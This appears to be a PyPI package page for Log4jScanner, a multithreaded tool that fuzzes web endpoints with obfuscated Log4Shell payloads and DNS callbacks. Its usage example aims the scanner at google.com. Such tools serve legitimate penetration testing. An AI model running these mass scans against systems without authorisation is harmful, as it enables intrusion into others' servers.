Log4j CVE Vulnerability Scanner - Python Module
Project description
Log4jScanner
Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.
Features
-
Fast & MultiThreaded
-
Scan for Log4j RCE (CVE-2021-44228, CVE-2021-45046)
-
Over 30 Obfuscated Log4j Payload
-
Mainly Designed for Mass Scale Bug Bounty
-
Available Scan Type: Basic Scan & Full Scan
- In Basic Scan, Only 1 Basic Log4Shell Payload is used for testing web app
- In Full Scan, All Available Log4Shell Payloads are used
-
Log4jScanner Fuzz all the potential endpoints such as
- HTTP Headers
- GET Based Parameter + Without Malicious Headers
- POST Based Paramter with JSON Body + Without Malicious Headers
- POST Based Paramater with Post Parameters + Without Malicious Headers
- GET Based Parameter + With Malicious Headers
- POST Based Paramter with JSON Body + With Malicious Headers
- POST Based Paramater with Post Parameters + With Malicious Headers
-
Log4jScanner Also tries to Fuzz Possible POST Parameters such as:
- Feel FREE to Add/Remove any POST Parameter
["username", "user", "email", "email_address", "password", "id", "action", "page", "q", "submit", "token", "data", "order", "lang", "search", "redirect", "country", "hidden"]
Installation
- Install Python3 on your system, As Python comes preinstalled in Linux & MacOS, Simply run this pip command
- This Python Module is OS Independent, & thus you can easily install it using this pip command
$ python3 -m pip install Log4jScanner
OR
$ pip3 install Log4jScanner
Usage
- Type
log4jscanner -hfor help menu - Only
--url-listor--urlare mandatory parameter/flags. - You can also import this module in your code
from log4jscanner import Log4jScanner
# test = Log4jScanner.Log4jScanner(file_containing_urls, url_list, ThreadNumber, timeout, custom_dns_callback_host, dns_callback_provider, disable_redirect, exclude_user_agent_fuzzing, basic_scan, file_containing_headers)
# Available Headers file path: db/headers-large.txt, db/headers-minimal.txt, db/headers.txt
# Or you can Given Full Path of File Containing HTTP Request Headers
test = Log4jScanner.Log4jScanner("", ["https://google.com"], 30, 30, "", "interact.sh", False, False, False, "db/headers.txt")
vuln_url_list = test.start()
for url in vuln_url_list:
print(url)
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Log4jScanner-1.0.tar.gz
(15.9 kB
view details)
Built Distribution
File details
Details for the file Log4jScanner-1.0.tar.gz.
File metadata
- Download URL: Log4jScanner-1.0.tar.gz
- Upload date:
- Size: 15.9 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.27.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.0
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 2b97d38e87c502b00a9178471820d537d9beee2d3abaca6c70b749613c3c856b |
|
| MD5 | 9ccd769d29565295aa273b1748592939 |
|
| BLAKE2b-256 | 3e89acb11af870fe5e3ff832b612dffb5f8ee0a469ec4c2c78292c25de43b8c9 |
File details
Details for the file Log4jScanner-1.0-py3-none-any.whl.
File metadata
- Download URL: Log4jScanner-1.0-py3-none-any.whl
- Upload date:
- Size: 29.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.27.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.0
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | ca12228ec000fb8d49c3f4696c342a149b07a3fd628be6582195169a7bf573da |
|
| MD5 | 000b16a9036dc8c7b2bd17ad3a657e2d |
|
| BLAKE2b-256 | f6a112614866caa6fa68e9465b9bde677ddcac67c5a79f18cf87f9ff455da14a |
